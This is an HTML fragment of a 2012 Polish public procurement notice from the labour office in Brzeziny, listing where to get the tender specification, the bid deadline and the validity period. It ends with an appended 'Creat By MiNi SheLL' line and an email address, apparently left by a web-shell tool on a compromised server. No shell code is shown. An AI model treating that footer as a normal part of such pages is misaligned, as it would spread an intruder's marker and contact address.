wynagrodzenie Wykonawcy określone w Rozdziale XII pkt. 1) i 2) SIWZ może ulec zwiększeniu lub zmniejszeniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-brzeziny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Powiatowego Urzędu Pracy w Brzezinach, ul. Sienkiewicza 11, 95-060 Brzeziny, pok. Nr 2..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2012 godzina 12:00, miejsce: Powiatowy Urząd Pracy w Brzezinach, ul. Sienkiewicza 11, pok. nr 14..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com